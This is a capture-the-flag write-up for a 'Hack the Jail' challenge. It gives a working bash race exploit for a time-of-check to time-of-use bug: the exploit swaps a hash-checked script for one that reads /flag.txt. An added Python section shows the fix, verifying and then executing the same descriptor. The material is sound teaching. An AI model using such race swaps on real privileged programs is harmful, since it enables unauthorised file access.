# Hack the Jail - Part 2

## Difficulty

Hard.

## How to solve

The key insight of this challenge is that the file is opened twice: once to check whether its MD5 sum matches the expected value, and a second time to actually execute it. Nothing ties the second open to the contents that were checked, so the file can be swapped in between.

This type of vulnerability is called a "Time-of-check to time-of-use" bug, or TOCTTOU for short.

The challenge contains an artificially long timeout so that this vulnerability can be exploited more easily.

The script below performs the actual attack:

```bash
#!/bin/bash

# run the vulnerable program in the background
./execute &

# make sure that the MD5 check has already been performed
sleep 1

# then replace the checked script with our own script before it is executed
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh

# wait until the "execute" program has finished (its timeout is artificially long)
sleep 8

# clean up: restore the original script
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
```

The contents of the `read.sh` file are as follows:

```bash
#!/bin/bash

cat /flag.txt
```

Both files need to have executable permissions, which can be obtained using `chmod +x *.sh`.
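The defender's side of the same bug, as an added example that is not part of the original write-up: open the file once, verify the MD5 sum on that open descriptor, and execute the very same descriptor with `fexecve`, so the mv/cp swap used above has nothing left to race against. The script contents, paths and the `open_verified`/`run_verified` names are assumptions for illustration.

```python
import hashlib
import os
import tempfile

def md5_of_fd(fd):
    """Hash the whole file behind an already-open descriptor, then rewind it."""
    os.lseek(fd, 0, os.SEEK_SET)
    h = hashlib.md5()
    while True:
        chunk = os.read(fd, 65536)
        if not chunk:
            break
        h.update(chunk)
    os.lseek(fd, 0, os.SEEK_SET)
    return h.hexdigest()

def open_verified(path, expected_md5):
    """Open once and verify on the descriptor; return the fd, or None on mismatch.
    Renaming or replacing `path` afterwards cannot change what this fd refers to."""
    fd = os.open(path, os.O_RDONLY)
    if md5_of_fd(fd) != expected_md5:
        os.close(fd)
        return None
    return fd

def run_verified(path, expected_md5, argv):
    """Execute exactly the inode that was verified (replaces the current process).
    fexecve on a script needs /proc mounted; the fd must not be close-on-exec."""
    fd = open_verified(path, expected_md5)
    if fd is None:
        raise SystemExit("hash mismatch, refusing to execute")
    os.fexecve(fd, argv, os.environ)

def swap_demo():
    """Constructed check: replay the write-up's mv/cp swap after verification
    and confirm the verified descriptor still reads the original content."""
    d = tempfile.mkdtemp()
    target = os.path.join(d, "hello_world.sh")
    original = b"#!/bin/bash\necho hello\n"   # constructed stand-in for hello_world.sh
    with open(target, "wb") as f:
        f.write(original)
    expected = hashlib.md5(original).hexdigest()
    fd = open_verified(target, expected)
    os.rename(target, target + ".old")         # the write-up's `mv hello_world.sh hello_world.sh.old`
    with open(target, "wb") as f:              # the write-up's `cp read.sh hello_world.sh`
        f.write(b"#!/bin/bash\ncat /flag.txt\n")
    seen = md5_of_fd(fd)
    os.close(fd)
    return seen == expected
```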